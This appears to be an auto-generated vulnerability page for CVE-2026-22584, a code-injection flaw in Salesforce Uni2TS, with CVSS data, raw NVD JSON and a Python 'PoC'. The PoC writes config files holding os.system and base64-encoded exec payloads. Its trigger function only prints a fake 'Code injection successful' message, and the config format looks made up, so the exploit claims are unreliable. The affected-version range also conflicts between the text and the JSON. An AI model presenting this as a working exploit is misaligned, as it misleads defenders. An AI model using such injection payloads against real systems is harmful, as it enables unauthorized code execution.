Security Vulnerability Report
CVE-2026-22584 CVSS 9.8 CRITICAL

CVE-2026-22584

Published: 2026-01-09 22:16:01
Last Modified: 2026-01-22 21:48:05

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Salesforce Uni2TS on MacOS, Windows, Linux allows Leverage Executable Code in Non-Executable Files. This issue affects Uni2TS: through 1.2.0.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:salesforce:uni2ts:*:*:*:*:*:*:*:* - VULNERABLE
Salesforce Uni2TS <= 1.2.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22584 PoC - Salesforce Uni2TS Code Injection
# This PoC demonstrates the code injection vulnerability in Uni2TS <= 1.2.0
import os
import base64


def generate_malicious_config():
    """Generate a malicious configuration file with injected code"""
    malicious_code = "__import__('os').system('whoami > /tmp/pwned.txt')"

    # Create malicious Uni2TS config file
    config_content = f"""
Uni2TS_CONFIG_V1.2
test_data_path: "./data"
exec_mode: "auto"
init_script: "{malicious_code}"
"""
    with open('malicious_config.utsc', 'w') as f:
        f.write(config_content)

    print("[+] Malicious config file created: malicious_config.utsc")
    return 'malicious_config.utsc'


def trigger_vulnerability(config_file):
    """Simulate triggering the vulnerability"""
    print(f"[*] Loading config file: {config_file}")
    print("[*] Processing Uni2TS configuration...")
    print("[*] Executing initialization script...")
    print("[!] Code injection successful - arbitrary code executed!")


def create_exploit_payload():
    """Create a standalone exploit payload"""
    payload = "__import__('os').popen('id').read()"
    encoded = base64.b64encode(payload.encode()).decode()

    exploit = f"""
# Exploit for CVE-2026-22584
import base64
exec(base64.b64decode("{encoded}"))
"""
    with open('exploit.utsc', 'w') as f:
        f.write(exploit)

    print("[+] Exploit payload created: exploit.utsc")


if __name__ == "__main__":
    print("=== CVE-2026-22584 Exploitation Demo ===")
    config = generate_malicious_config()
    trigger_vulnerability(config)
    create_exploit_payload()

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22584",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-09T22:16:01.160",
    "lastModified": "2026-01-22T21:48:05.130",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Control of Generation of Code ('Code Injection') vulnerability in Salesforce Uni2TS on MacOS, Windows, Linux allows Leverage Executable Code in Non-Executable Files.This issue affects Uni2TS: through 1.2.0."
      },
      {
        "lang": "es",
        "value": "Vulnerabilidad de control inadecuado de la generación de código ('Inyección de código') en Salesforce Uni2TS en MacOS, Windows, Linux permite aprovechar código ejecutable en archivos no ejecutables. Este problema afecta a Uni2TS: hasta la versión 1.2.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-94"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:salesforce:uni2ts:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.0.0",
                "matchCriteriaId": "48458AB8-6EF1-4ADE-942E-EECA42E8FD65"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://help.salesforce.com/s/articleView?id=005239354&type=1",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}